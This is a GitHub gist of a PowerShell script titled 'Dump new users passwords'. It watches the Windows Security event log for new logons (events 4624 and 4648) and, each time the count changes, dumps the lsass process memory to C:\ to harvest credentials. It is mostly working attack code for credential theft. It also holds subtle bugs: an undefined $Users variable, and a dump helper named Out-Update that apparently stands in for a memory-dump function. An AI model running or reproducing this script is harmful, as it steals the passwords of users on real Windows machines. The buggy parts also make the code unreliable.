Last active
August 29, 2015 14:16
-
-
Save breakersall/191d4a031704387475da to your computer and use it in GitHub Desktop.
Dump new users passwords
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Number of minutes to go | |
| [int]$MinutesToCheck = 10080 | |
| function Find-4648Logons | |
| { | |
| <# | |
| .SYNOPSIS | |
| Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the | |
| the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful | |
| for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. | |
| Function: Find-4648Logons | |
| Author: Joe Bialek, Twitter: @JosephBialek | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| Version: 1.1 | |
| .DESCRIPTION | |
| Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the | |
| the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful | |
| for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. | |
| .EXAMPLE | |
| Find-4648Logons | |
| Gets the unique 4648 logon events. | |
| .NOTES | |
| .LINK | |
| Blog: http://clymb3r.wordpress.com/ | |
| Github repo: https://github.com/clymb3r/PowerShell | |
| #> | |
| Param( | |
| $SecurityLog | |
| ) | |
| $ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648} | |
| $ReturnInfo = @{} | |
| foreach ($ExplicitLogon in $ExplicitLogons) | |
| { | |
| $Subject = $false | |
| $AccountWhosCredsUsed = $false | |
| $TargetServer = $false | |
| $SourceAccountName = "" | |
| $SourceAccountDomain = "" | |
| $TargetAccountName = "" | |
| $TargetAccountDomain = "" | |
| $TargetServer = "" | |
| foreach ($line in $ExplicitLogon.Message -split "\r\n") | |
| { | |
| if ($line -cmatch "^Subject:$") | |
| { | |
| $Subject = $true | |
| } | |
| elseif ($line -cmatch "^Account\sWhose\sCredentials\sWere\sUsed:$") | |
| { | |
| $Subject = $false | |
| $AccountWhosCredsUsed = $true | |
| } | |
| elseif ($line -cmatch "^Target\sServer:") | |
| { | |
| $AccountWhosCredsUsed = $false | |
| $TargetServer = $true | |
| } | |
| elseif ($Subject -eq $true) | |
| { | |
| if ($line -cmatch "\s+Account\sName:\s+(\S.*)") | |
| { | |
| $SourceAccountName = $Matches[1] | |
| } | |
| elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") | |
| { | |
| $SourceAccountDomain = $Matches[1] | |
| } | |
| } | |
| elseif ($AccountWhosCredsUsed -eq $true) | |
| { | |
| if ($line -cmatch "\s+Account\sName:\s+(\S.*)") | |
| { | |
| $TargetAccountName = $Matches[1] | |
| } | |
| elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)") | |
| { | |
| $TargetAccountDomain = $Matches[1] | |
| } | |
| } | |
| elseif ($TargetServer -eq $true) | |
| { | |
| if ($line -cmatch "\s+Target\sServer\sName:\s+(\S.*)") | |
| { | |
| $TargetServer = $Matches[1] | |
| } | |
| } | |
| } | |
| #Filter out logins that don't matter | |
| if (-not ($TargetAccountName -cmatch "^DWM-.*" -and $TargetAccountDomain -cmatch "^Window\sManager$")) | |
| { | |
| $Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer | |
| if (-not $ReturnInfo.ContainsKey($Key)) | |
| { | |
| $Properties = @{ | |
| LogType = 4648 | |
| LogSource = "Security" | |
| SourceAccountName = $SourceAccountName | |
| SourceDomainName = $SourceAccountDomain | |
| TargetAccountName = $TargetAccountName | |
| TargetDomainName = $TargetAccountDomain | |
| TargetServer = $TargetServer | |
| Count = 1 | |
| Times = @($ExplicitLogon.TimeGenerated) | |
| } | |
| $ResultObj = New-Object PSObject -Property $Properties | |
| $ReturnInfo.Add($Key, $ResultObj) | |
| } | |
| else | |
| { | |
| $ReturnInfo[$Key].Count++ | |
| $ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated | |
| } | |
| } | |
| } | |
| return $ReturnInfo | |
| } | |
| function Find-4624Logons | |
| { | |
| <# | |
| .SYNOPSIS | |
| Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do | |
| network logons in to the server, what accounts RDP in, what accounts log in locally, etc... | |
| Function: Find-4624Logons | |
| Author: Joe Bialek, Twitter: @JosephBialek | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| Version: 1.1 | |
| .DESCRIPTION | |
| Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do | |
| network logons in to the server, what accounts RDP in, what accounts log in locally, etc... | |
| .EXAMPLE | |
| Find-4624Logons | |
| Find unique 4624 logon events. | |
| .NOTES | |
| .LINK | |
| Blog: http://clymb3r.wordpress.com/ | |
| Github repo: https://github.com/clymb3r/PowerShell | |
| #> | |
| Param ( | |
| $SecurityLog | |
| ) | |
| $Logons = $SecurityLog | Where {$_.InstanceID -eq 4624} | |
| $ReturnInfo = @{} | |
| foreach ($Logon in $Logons) | |
| { | |
| $SubjectSection = $false | |
| $NewLogonSection = $false | |
| $NetworkInformationSection = $false | |
| $AccountName = "" | |
| $AccountDomain = "" | |
| $LogonType = "" | |
| $NewLogonAccountName = "" | |
| $NewLogonAccountDomain = "" | |
| $WorkstationName = "" | |
| $SourceNetworkAddress = "" | |
| $SourcePort = "" | |
| foreach ($line in $Logon.Message -Split "\r\n") | |
| { | |
| if ($line -cmatch "^Subject:$") | |
| { | |
| $SubjectSection = $true | |
| } | |
| elseif ($line -cmatch "^Logon\sType:\s+(\S.*)") | |
| { | |
| $LogonType = $Matches[1] | |
| } | |
| elseif ($line -cmatch "^New\sLogon:$") | |
| { | |
| $SubjectSection = $false | |
| $NewLogonSection = $true | |
| } | |
| elseif ($line -cmatch "^Network\sInformation:$") | |
| { | |
| $NewLogonSection = $false | |
| $NetworkInformationSection = $true | |
| } | |
| elseif ($SubjectSection) | |
| { | |
| if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") | |
| { | |
| $AccountName = $Matches[1] | |
| } | |
| elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") | |
| { | |
| $AccountDomain = $Matches[1] | |
| } | |
| } | |
| elseif ($NewLogonSection) | |
| { | |
| if ($line -cmatch "^\s+Account\sName:\s+(\S.*)") | |
| { | |
| $NewLogonAccountName = $Matches[1] | |
| } | |
| elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)") | |
| { | |
| $NewLogonAccountDomain = $Matches[1] | |
| } | |
| } | |
| elseif ($NetworkInformationSection) | |
| { | |
| if ($line -cmatch "^\s+Workstation\sName:\s+(\S.*)") | |
| { | |
| $WorkstationName = $Matches[1] | |
| } | |
| elseif ($line -cmatch "^\s+Source\sNetwork\sAddress:\s+(\S.*)") | |
| { | |
| $SourceNetworkAddress = $Matches[1] | |
| } | |
| elseif ($line -cmatch "^\s+Source\sPort:\s+(\S.*)") | |
| { | |
| $SourcePort = $Matches[1] | |
| } | |
| } | |
| } | |
| #Filter out logins that don't matter | |
| if (-not ($NewLogonAccountDomain -cmatch "NT\sAUTHORITY" -or $NewLogonAccountDomain -cmatch "Window\sManager")) | |
| { | |
| $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort | |
| if (-not $ReturnInfo.ContainsKey($Key)) | |
| { | |
| $Properties = @{ | |
| LogType = 4624 | |
| LogSource = "Security" | |
| SourceAccountName = $AccountName | |
| SourceDomainName = $AccountDomain | |
| NewLogonAccountName = $NewLogonAccountName | |
| NewLogonAccountDomain = $NewLogonAccountDomain | |
| LogonType = $LogonType | |
| WorkstationName = $WorkstationName | |
| SourceNetworkAddress = $SourceNetworkAddress | |
| SourcePort = $SourcePort | |
| Count = 1 | |
| Times = @($Logon.TimeGenerated) | |
| } | |
| $ResultObj = New-Object PSObject -Property $Properties | |
| $ReturnInfo.Add($Key, $ResultObj) | |
| } | |
| else | |
| { | |
| $ReturnInfo[$Key].Count++ | |
| $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated | |
| } | |
| } | |
| } | |
| return $ReturnInfo | |
| } | |
| $SecurityLogStatic = Get-EventLog -LogName Security | |
| $UsersLocal = Find-4624Logons -SecurityLog $SecurityLogStatic | |
| $UserLocalCount = $UsersLocal.Count | |
| $UsersRemote = Find-4648Logons -SecurityLog $SecurityLogStatic | |
| $UserRemoteCount = $Users.Count | |
| $i=1 | |
| While($i -ne $MinutesToCheck) | |
| { | |
| $SecurityLog = Get-EventLog -LogName Security | |
| $UsersLocalTmp = Find-4624Logons -SecurityLog $SecurityLog | |
| $UsersRemoteTmp = Find-4648Logons -SecurityLog $SecurityLog | |
| if (($UsersLocalTmp.Count -ne $UserLocalCount) -or $UsersRemoteTmp.Count -ne $UserRemoteCount) | |
| { | |
| Write-Host "**********Someone just logged on!*************" | |
| Write-Host "Currently Logged in local users:" | |
| Write-Host "$UsersLocalTmp" | |
| Write-Host "Currently Logged in remote users:" | |
| Write-Host "$UsersRemoteTmp" | |
| Write-Host "Dumping memory to C:\number.dmp:" | |
| $out = "$i" + ".dmp" | |
| Get-Process lsass | Out-Update -DumpFilePath "C:\" -ProcessFileName $out | |
| } | |
| Start-Sleep -Seconds 60 | |
| Write-Host "." | |
| $i++ | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment